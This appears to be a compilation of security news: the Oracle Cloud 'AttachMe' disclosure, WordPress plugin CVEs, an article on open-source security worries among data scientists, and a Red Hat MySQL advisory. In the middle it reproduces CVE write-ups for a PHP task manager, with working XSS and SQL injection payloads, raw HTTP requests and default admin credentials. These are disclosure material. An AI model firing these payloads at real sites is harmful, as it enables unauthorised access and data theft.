Researchers have disclosed a new severe Oracle Cloud Infrastructure (OCI) vulnerability that could be exploited by users to access the virtual disks of other Oracle customers.
"Each virtual disk in Oracle's cloud has a unique identifier called OCID," Shir Tamari, head of research at Wiz, said in a series of tweets. "This identifier is not considered secret, and organizations do not treat it as

Researchers have disclosed a new severe Oracle Cloud Infrastructure (OCI) vulnerability that could be exploited by users to access the virtual disks of other Oracle customers.

"Each virtual disk in Oracle's cloud has a unique identifier called OCID," Shir Tamari, head of research at Wiz, said in a series of tweets. "This identifier is not considered secret, and organizations do not treat it as such."

"Given the OCID of a victim's disk that is not currently attached to an active server or configured as shareable, an attacker could 'attach' to it and obtain read/write over it," Tamari added.

The cloud security firm, which dubbed the tenant isolation vulnerability "**AttachMe**," said Oracle patched the issue within 24 hours of responsible disclosure on June 9, 2022.

Accessing a volume using the CLI without sufficient permissions

At its core, the vulnerability is rooted in the fact that a disk could be attached to a compute instance in another account via the Oracle Cloud Identifier (OCID) without any explicit authorization.

This meant that an attacker in possession of the OCID could have taken advantage of AttachMe to access any storage volume, resulting in data exposure, exfiltration, or worse, alter boot volumes to gain code execution.

Besides knowing the OCID of the target volume, another prerequisite to pull off the attack is that the adversary's instance must be in the same Availability Domain (AD) as the target.

"Insufficient validation of user permissions is a common bug class among cloud service providers," Wiz researcher Elad Gabay said. "The best way to identify such issues is by performing rigorous code reviews and comprehensive tests for each sensitive API in the development stage."

The findings arrive nearly five months after Microsoft addressed a pair of issues with the Azure Database for PostgreSQL Flexible Server that could result in unauthorized cross-account database access in a region.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Disclose Critical Vulnerability in Oracle Cloud Infrastructure

Multiple Authenticated (custom specific plugin role) Persistent Cross-Site Scripting (XSS) vulnerability in Awesome Support plugin <= 6.0.7 at WordPress.

CVE-2022-38073: Awesome Support – WordPress HelpDesk & Support Plugin

Authenticated Arbitrary Code Execution vulnerability in Soflyy Import any XML or CSV File to WordPress plugin <= 3.6.7 at WordPress.

CVE-2022-36386: Import any XML or CSV File to WordPress

SourceCodester Simple Task Managing System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component newProjectValidation.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fullName parameter.

**Simple Task Managing System - XSS2**

A vulnerability classified as problematic was found in SourceCodester Simple Task Managing System. This vulnerability affects unknown code. The manipulation of the argument newProjectValidation.php leads to cross site scripting. The attack can be initiated remotely.

username:admin password:admin ----> {ip}/newProjectValidation.php

Supplier： https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html

/newProjectValidation.php has XSS

> Payload: "><ScRiPt>alert(1)</sCrIpT>

XSS because $full can be closed

**Payload**

GET http://localhost/cve/Task%20Managing%20System%20in%20PHP/newTask.php?sn\=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E HTTP/1.1
Host: localhost
Cache\-Control: max\-age\=0
sec\-ch\-ua: ";Not A Brand";v\="99", "Chromium";v\="94"
sec\-ch\-ua\-mobile: ?0
sec\-ch\-ua\-platform: "Windows"
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn
Connection: close

CVE-2022-40028: CVE_HUNTER/2022-09-01-XSS2.md at main · xidaner/CVE_HUNTER

SourceCodester Simple Task Managing System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component newTask.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the shortName parameter.

**Simple Task Managing System - XSS**

A vulnerability classified as problematic was found in SourceCodester Simple Task Managing System. This vulnerability affects unknown code. The manipulation of the argument newTask.php leads to cross site scripting. The attack can be initiated remotely.

username:admin password:admin ----> {ip}/newTask.php

Supplier： https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html

/board.php has XSS

> Payload: "><ScRiPt>alert(1)</sCrIpT>

XSS because $shortName can be closed

**Payload**

GET http://localhost/cve/Task%20Managing%20System%20in%20PHP/newTask.php?sn\=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E HTTP/1.1
Host: localhost
Cache\-Control: max\-age\=0
sec\-ch\-ua: ";Not A Brand";v\="99", "Chromium";v\="94"
sec\-ch\-ua\-mobile: ?0
sec\-ch\-ua\-platform: "Windows"
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn
Connection: close

CVE-2022-40027: CVE_HUNTER/2022-09-01-XSS1.md at main · xidaner/CVE_HUNTER

SourceCodester Simple Task Managing System v1.0 was discovered to contain a SQL injection vulnerability via the bookId parameter at board.php.

**Simple Task Managing System - SQL injection**

Simple Task Managing System v1.0 exists to contain a SQL injection vulnerability via the bookId parameter at /board.php

username:admin password:admin ----> {ip}/board.php

Supplier： https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html

/board.php has SQL injection

Payload: http://localhost:80/cve/Task Managing System in PHP/board.php?sn=admin1' AND ROW(6066,2526)>(SELECT COUNT(\*),CONCAT(0x7171787a71,(SELECT (ELT(6066=6066,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM (SELECT 5176 UNION SELECT 2058 UNION SELECT 2430 UNION SELECT 5444)a GROUP BY x) AND 'MkOa'='MkOa

SQL injection because $shortName can be closed

**Payload**

GET http://localhost:80/cve/Task Managing System in PHP/board.php?sn\=admin1' AND ROW(6066,2526)>(SELECT COUNT(\*),CONCAT(0x7171787a71,(SELECT (ELT(6066=6066,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM (SELECT 5176 UNION SELECT 2058 UNION SELECT 2430 UNION SELECT 5444)a GROUP BY x) AND 'MkOa'\='MkOa HTTP/1.1
Host: localhost
sec\-ch\-ua: ";Not A Brand";v\="99", "Chromium";v\="94"
sec\-ch\-ua\-mobile: ?0
sec\-ch\-ua\-platform: "Windows"
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn
Connection: close

CVE-2022-40026: CVE_HUNTER/2022-09-01-SQL1.md at main · xidaner/CVE_HUNTER

Data scientists, who often choose open source packages without considering security, increasingly face concerns over the unvetted use of those components, new study shows.

Vulnerabilities in open source components — such as the widespread flaws revealed 10 months ago in Log4j 2.0 — have forced data scientists to reevaluate the open source code frequently used in analysis and the creation of machine learning models.

According to a report by Anaconda, a data-science platform firm, in the past year, 40% of surveyed data scientists, business analysts, and students have scaled back their use of open source components, while a third remained steady, and only 7% incorporated more open source code into their projects. The majority of those surveyed do not report to the information technology department (18%), but work within their own data science or research and development group (47%), according to Anaconda's "2022 State of Data Science" report, released last week.

While software developers and IT have already started vetting secure code, the concerns over the security in open source software is a relatively new trend for the data science world, says Peter Wang, co-founder and CEO of Anaconda.

"We see a tremendous portion of people who are at organizations where IT has created a very strict posture around open source and Python," he says. "These are not expert developers. ... They are data scientists and machine learning people who may not be very seasoned developers at all, using whatever they could download to do their analysis, and then they handed that over that to IT."

The security of open source components — and the software supply chain, in general — has become a primary consideration among software developers, businesses, and national governments over the past two years. In May, for example, the US National Institute of Standards and Technology (NIST) issued guidance for address software supply chain risks. In addition, a growing number of software vendors have joined with the Linux Foundation's Open Software Security Foundation (OpenSSF).

    

While many data science teams scan open source components for vulnerabilities, many create their own software instead. Source: Anaconda's "2022 State of Data Science" report.

Overall, the maturity of organizations' security efforts has improved. About half of firms have an open source security policy in place, which leads to better performance in measures of security readiness, according to the June survey. In addition, the efforts to control open source risk has jumped by 51% in the past 12 months, a study of security maturity stated on Sept. 21.

"\[W\]ith the attention placed on software supply chains, most enterprise organizations are taking a risk-based approach to application security," Jason Schmitt, general manager of the Synopsys Software Integrity Group, said in a statement announcing the study. "Such an approach recognizes that security isn't limited to the codebase; it includes the process of software development where security reviews and testing 'shift everywhere' to continuously improve security outcomes."

**Devs Expand Use of Open Source **

Software companies are not seeing any sort of decrease in open source usage, according to other data. Instead, development organizations are focusing on improving the security of open source software and using security as a primary guide in selecting components.

In the "2021 State of the Software Supply Chain" report, for example, Sonatype found that the top four open source ecosystems — the Maven Central Repository (Java), Node.js (JavaScript), the Python Package Index (Python), and the NuGet gallery (.NET) — housed 37 million open source projects and components, an increase of 20% year-over-year. The demand for those components is likewise increasing: More than 2.2 trillion components were downloaded, a 73% annual increase.

A self-reported move away from open source packages by the data science community is likely indicative of greater awareness of security issues and less about jettisoning open source components in development, says Tracy Miranda, head of open source at Chainguard.

While data science teams and development teams may have reacted differently to major security issues — such as Log4j 2.0 — companies have little recourse when moving away from one open source package than to adopt a different package whose maintainers have put a greater emphasis on security, she says.

"Companies leverage open source as a way to increase their velocity so if they are scaling back, what are they scaling back to? Writing code in-house? Using third-party versions packaged up?" Miranda says, adding that instead, "I do think we can expect to see companies be more discerning about the quality of the open source they use, especially related to security features."

**Data Scientists Are Playing Catch-up**

The disconnect between the two sides is likely due to the different audiences in the various surveys. Anaconda's survey focused on data science professionals, as can be seen from their respondent's choice of programming languages — 58% used Python and 42% used SQL, while only 26% used JavaScript. 

A better measure of software developer sentiments is StackOverflow's "2022 Developer Survey," which found that while 58% of 'people learning to code' use Python, only 44% of professional developers code in that language. On the other hand, 68% of professional developers use JavaScript, according to StackOverflow's survey.

In addition, while data science professional work at companies that overwhelmingly (87%) allow open-source software, about a quarter (26%) have minimal oversight by the IT department of their open source choices, the Anaconda report stated. In another 18% of companies, the IT department only specifies about half of the available open source components.

The maintainers of the most critical projects — of which there are hundreds, if not thousands — need to use secure dependencies, test their own code, and validate the trustworthiness of contributors. The maintainers should also publish a security scorecard — a Google-created initiative now managed by the Open Source Security Foundation (OpenSSF), which gives a security grade to a project based on nearly 20 different criteria.

While awareness is likely increasing, there is no quick solution, Miranda says.

"The reality is that the more secure options have not previously existed," she says. "Trimming unnecessary dependencies to reduce attack surface is sensible, but it's hard to do once the dependency tree has grown large."

Data Scientists Dial Back Use of Open Source Code Due to Security Worries

Red Hat Security Advisory 2022-6590-01 - MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon and many client programs and libraries.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: mysql security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6590-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6590  
Issue date:        2022-09-20  
CVE Names:         CVE-2022-21412 CVE-2022-21413 CVE-2022-21414  
                   CVE-2022-21415 CVE-2022-21417 CVE-2022-21418  
                   CVE-2022-21423 CVE-2022-21425 CVE-2022-21427  
                   CVE-2022-21435 CVE-2022-21436 CVE-2022-21437  
                   CVE-2022-21438 CVE-2022-21440 CVE-2022-21444  
                   CVE-2022-21451 CVE-2022-21452 CVE-2022-21454  
                   CVE-2022-21455 CVE-2022-21457 CVE-2022-21459  
                   CVE-2022-21460 CVE-2022-21462 CVE-2022-21478  
                   CVE-2022-21479 CVE-2022-21509 CVE-2022-21515  
                   CVE-2022-21517 CVE-2022-21522 CVE-2022-21525  
                   CVE-2022-21526 CVE-2022-21527 CVE-2022-21528  
                   CVE-2022-21529 CVE-2022-21530 CVE-2022-21531  
                   CVE-2022-21534 CVE-2022-21537 CVE-2022-21538  
                   CVE-2022-21539 CVE-2022-21547 CVE-2022-21553  
                   CVE-2022-21556 CVE-2022-21569  
====================================================================  
1. Summary:

An update for mysql is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

MySQL is a multi-user, multi-threaded SQL database server. It consists of  
the MySQL server daemon (mysqld) and many client programs and libraries.

The following packages have been upgraded to a later upstream version:  
mysql (8.0.30). (BZ#2122589)

Security Fix(es):

* mysql: Server: Optimizer multiple unspecified vulnerabilities (CPU Apr  
2022) (CVE-2022-21412, CVE-2022-21414, CVE-2022-21435, CVE-2022-21436,  
CVE-2022-21437, CVE-2022-21438, CVE-2022-21440, CVE-2022-21452,  
CVE-2022-21459, CVE-2022-21462, CVE-2022-21478, CVE-2022-21479)

* mysql: Server: DML unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21413)

* mysql: Server: Replication unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21415)

* mysql: InnoDB multiple unspecified vulnerabilities (CPU Apr 2022)  
(CVE-2022-21417, CVE-2022-21418, CVE-2022-21451, CVE-2022-21423)

* mysql: Server: DDL multiple unspecified vulnerabilities (CPU Apr 2022)  
(CVE-2022-21425, CVE-2022-21444)

* mysql: Server: FTS unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21427)

* mysql: Server: Group Replication Plugin unspecified vulnerability (CPU  
Apr 2022) (CVE-2022-21454)

* mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Jul 2022)  
(CVE-2022-21455)

* mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21457)

* mysql: Server: Logging unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21460)

* mysql: Server: Optimizer multiple unspecified vulnerabilities (CPU Jul  
2022) (CVE-2022-21509, CVE-2022-21525, CVE-2022-21526, CVE-2022-21527,  
CVE-2022-21528, CVE-2022-21529, CVE-2022-21530, CVE-2022-21531,  
CVE-2022-21553, CVE-2022-21556, CVE-2022-21569)

* mysql: Server: Options unspecified vulnerability (CPU Jul 2022)  
(CVE-2022-21515)

* mysql: InnoDB multiple unspecified vulnerabilities (CPU Jul 2022)  
(CVE-2022-21517, CVE-2022-21537, CVE-2022-21539)

* mysql: Server: Stored Procedure multiple unspecified vulnerabilities (CPU  
Jul 2022) (CVE-2022-21522, CVE-2022-21534)

* mysql: Server: Federated unspecified vulnerability (CPU Jul 2022)  
(CVE-2022-21547)

* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jul  
2022) (CVE-2022-21538)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Default logrotate set to wrong log file (BZ#2122592)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the MySQL server daemon (mysqld) will be  
restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2082636 - CVE-2022-21412 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082637 - CVE-2022-21413 mysql: Server: DML unspecified vulnerability (CPU Apr 2022)  
2082638 - CVE-2022-21414 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082639 - CVE-2022-21415 mysql: Server: Replication unspecified vulnerability (CPU Apr 2022)  
2082640 - CVE-2022-21417 mysql: InnoDB unspecified vulnerability (CPU Apr 2022)  
2082641 - CVE-2022-21418 mysql: InnoDB unspecified vulnerability (CPU Apr 2022)  
2082642 - CVE-2022-21423 mysql: InnoDB unspecified vulnerability (CPU Apr 2022)  
2082643 - CVE-2022-21425 mysql: Server: DDL unspecified vulnerability (CPU Apr 2022)  
2082644 - CVE-2022-21427 mysql: Server: FTS unspecified vulnerability (CPU Apr 2022)  
2082645 - CVE-2022-21435 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082646 - CVE-2022-21436 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082647 - CVE-2022-21437 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082648 - CVE-2022-21438 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082649 - CVE-2022-21440 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082650 - CVE-2022-21444 mysql: Server: DDL unspecified vulnerability (CPU Apr 2022)  
2082651 - CVE-2022-21451 mysql: InnoDB unspecified vulnerability (CPU Apr 2022)  
2082652 - CVE-2022-21452 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082653 - CVE-2022-21454 mysql: Server: Group Replication Plugin unspecified vulnerability (CPU Apr 2022)  
2082654 - CVE-2022-21457 mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Apr 2022)  
2082655 - CVE-2022-21459 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082656 - CVE-2022-21460 mysql: Server: Logging unspecified vulnerability (CPU Apr 2022)  
2082657 - CVE-2022-21462 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082658 - CVE-2022-21478 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082659 - CVE-2022-21479 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2115282 - CVE-2022-21455 mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Jul 2022)  
2115283 - CVE-2022-21509 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115284 - CVE-2022-21515 mysql: Server: Options unspecified vulnerability (CPU Jul 2022)  
2115285 - CVE-2022-21517 mysql: InnoDB unspecified vulnerability (CPU Jul 2022)  
2115286 - CVE-2022-21522 mysql: Server: Stored Procedure unspecified vulnerability (CPU Jul 2022)  
2115287 - CVE-2022-21525 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115288 - CVE-2022-21526 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115289 - CVE-2022-21527 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115290 - CVE-2022-21528 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115291 - CVE-2022-21529 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115292 - CVE-2022-21530 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115293 - CVE-2022-21531 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115294 - CVE-2022-21534 mysql: Server: Stored Procedure unspecified vulnerability (CPU Jul 2022)  
2115295 - CVE-2022-21537 mysql: InnoDB unspecified vulnerability (CPU Jul 2022)  
2115296 - CVE-2022-21538 mysql: Server: Security: Encryption unspecified vulnerability (CPU Jul 2022)  
2115297 - CVE-2022-21539 mysql: InnoDB unspecified vulnerability (CPU Jul 2022)  
2115298 - CVE-2022-21547 mysql: Server: Federated unspecified vulnerability (CPU Jul 2022)  
2115299 - CVE-2022-21553 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115300 - CVE-2022-21556 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115301 - CVE-2022-21569 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2122589 - [Tracker] Rebase to MySQL 8.0.30 [rhel-9.0.0.z]  
2122592 - Default logrotate set to wrong log file [rhel-9.0.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
mysql-8.0.30-3.el9_0.src.rpm

aarch64:  
mysql-8.0.30-3.el9_0.aarch64.rpm  
mysql-common-8.0.30-3.el9_0.aarch64.rpm  
mysql-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-debugsource-8.0.30-3.el9_0.aarch64.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-errmsg-8.0.30-3.el9_0.aarch64.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-server-8.0.30-3.el9_0.aarch64.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.aarch64.rpm

ppc64le:  
mysql-8.0.30-3.el9_0.ppc64le.rpm  
mysql-common-8.0.30-3.el9_0.ppc64le.rpm  
mysql-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-debugsource-8.0.30-3.el9_0.ppc64le.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-errmsg-8.0.30-3.el9_0.ppc64le.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-server-8.0.30-3.el9_0.ppc64le.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.ppc64le.rpm

s390x:  
mysql-8.0.30-3.el9_0.s390x.rpm  
mysql-common-8.0.30-3.el9_0.s390x.rpm  
mysql-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-debugsource-8.0.30-3.el9_0.s390x.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-errmsg-8.0.30-3.el9_0.s390x.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-server-8.0.30-3.el9_0.s390x.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.s390x.rpm

x86_64:  
mysql-8.0.30-3.el9_0.x86_64.rpm  
mysql-common-8.0.30-3.el9_0.x86_64.rpm  
mysql-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-debugsource-8.0.30-3.el9_0.x86_64.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-errmsg-8.0.30-3.el9_0.x86_64.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-server-8.0.30-3.el9_0.x86_64.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
mysql-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-debugsource-8.0.30-3.el9_0.aarch64.rpm  
mysql-devel-8.0.30-3.el9_0.aarch64.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-libs-8.0.30-3.el9_0.aarch64.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-test-8.0.30-3.el9_0.aarch64.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.aarch64.rpm

ppc64le:  
mysql-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-debugsource-8.0.30-3.el9_0.ppc64le.rpm  
mysql-devel-8.0.30-3.el9_0.ppc64le.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-libs-8.0.30-3.el9_0.ppc64le.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-test-8.0.30-3.el9_0.ppc64le.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.ppc64le.rpm

s390x:  
mysql-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-debugsource-8.0.30-3.el9_0.s390x.rpm  
mysql-devel-8.0.30-3.el9_0.s390x.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-libs-8.0.30-3.el9_0.s390x.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-test-8.0.30-3.el9_0.s390x.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.s390x.rpm

x86_64:  
mysql-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-debugsource-8.0.30-3.el9_0.x86_64.rpm  
mysql-devel-8.0.30-3.el9_0.x86_64.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-libs-8.0.30-3.el9_0.x86_64.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-test-8.0.30-3.el9_0.x86_64.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21412  
https://access.redhat.com/security/cve/CVE-2022-21413  
https://access.redhat.com/security/cve/CVE-2022-21414  
https://access.redhat.com/security/cve/CVE-2022-21415  
https://access.redhat.com/security/cve/CVE-2022-21417  
https://access.redhat.com/security/cve/CVE-2022-21418  
https://access.redhat.com/security/cve/CVE-2022-21423  
https://access.redhat.com/security/cve/CVE-2022-21425  
https://access.redhat.com/security/cve/CVE-2022-21427  
https://access.redhat.com/security/cve/CVE-2022-21435  
https://access.redhat.com/security/cve/CVE-2022-21436  
https://access.redhat.com/security/cve/CVE-2022-21437  
https://access.redhat.com/security/cve/CVE-2022-21438  
https://access.redhat.com/security/cve/CVE-2022-21440  
https://access.redhat.com/security/cve/CVE-2022-21444  
https://access.redhat.com/security/cve/CVE-2022-21451  
https://access.redhat.com/security/cve/CVE-2022-21452  
https://access.redhat.com/security/cve/CVE-2022-21454  
https://access.redhat.com/security/cve/CVE-2022-21455  
https://access.redhat.com/security/cve/CVE-2022-21457  
https://access.redhat.com/security/cve/CVE-2022-21459  
https://access.redhat.com/security/cve/CVE-2022-21460  
https://access.redhat.com/security/cve/CVE-2022-21462  
https://access.redhat.com/security/cve/CVE-2022-21478  
https://access.redhat.com/security/cve/CVE-2022-21479  
https://access.redhat.com/security/cve/CVE-2022-21509  
https://access.redhat.com/security/cve/CVE-2022-21515  
https://access.redhat.com/security/cve/CVE-2022-21517  
https://access.redhat.com/security/cve/CVE-2022-21522  
https://access.redhat.com/security/cve/CVE-2022-21525  
https://access.redhat.com/security/cve/CVE-2022-21526  
https://access.redhat.com/security/cve/CVE-2022-21527  
https://access.redhat.com/security/cve/CVE-2022-21528  
https://access.redhat.com/security/cve/CVE-2022-21529  
https://access.redhat.com/security/cve/CVE-2022-21530  
https://access.redhat.com/security/cve/CVE-2022-21531  
https://access.redhat.com/security/cve/CVE-2022-21534  
https://access.redhat.com/security/cve/CVE-2022-21537  
https://access.redhat.com/security/cve/CVE-2022-21538  
https://access.redhat.com/security/cve/CVE-2022-21539  
https://access.redhat.com/security/cve/CVE-2022-21547  
https://access.redhat.com/security/cve/CVE-2022-21553  
https://access.redhat.com/security/cve/CVE-2022-21556  
https://access.redhat.com/security/cve/CVE-2022-21569  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYypfs9zjgjWX9erEAQi29w/+IYQhWwETOzatTJhnrCzNRiXEOxbO6Jwe  
QfESim2Fkw3RG0d8SESKBSQ++cHYHPKHIvHBvTzsQRwDXTNRl/MXbRrhsTEEo1Ph  
JoLYIM3mi9kUgvzF+Hmbc+pUqsSoD189VpcJh/v9HQ77W9QsPuqGCgC4WEYeoMOe  
JDWA3CHRRosCKxJhRxmXMyuR5HyY2b08h7zKydFu2kcMHCEjfMtgKTYwrCKDFzHi  
HPTLyJyKYI3Kzj1msjQlRfmGvwY0Zu0Sp0O/Gt38C0kpZMKOjSsT9QSuLUUKDED0  
6bXpGW+LrF1FKnJy39mMmeEsKpcusWlIaveD+VlHsd+0ZE2FspoAZD+6NlIHMgDb  
S7cwLhkzRfdXsunveyzRYZFBhCRnAPYUqcTZuuXQb8HraLrdBOWPExH7maWy04F8  
gYZDGxrJBnxJK5YJzGufGDsm1A5N84SOmkgecZZtcW6p4ssCI8gTH59DdzFukpmR  
p57alaamiDccdEhFAnyh9yddpEllTTjQUHlT77zU661cKv57gjh+Op06/Y84uuDC  
t0rMCKUro/xINyMq5y+YoXSTQ0502PMNZIGrSs6HDnNv7F8bUfXwAG6KUhByA+lv  
vKYKtK4qTEV92vV6104ZboamOxdNNeIf/mQH4Gt8zwEId77RC0B0WXv01H1Ihc7C  
lJEKP7MBI4E=Z91l  
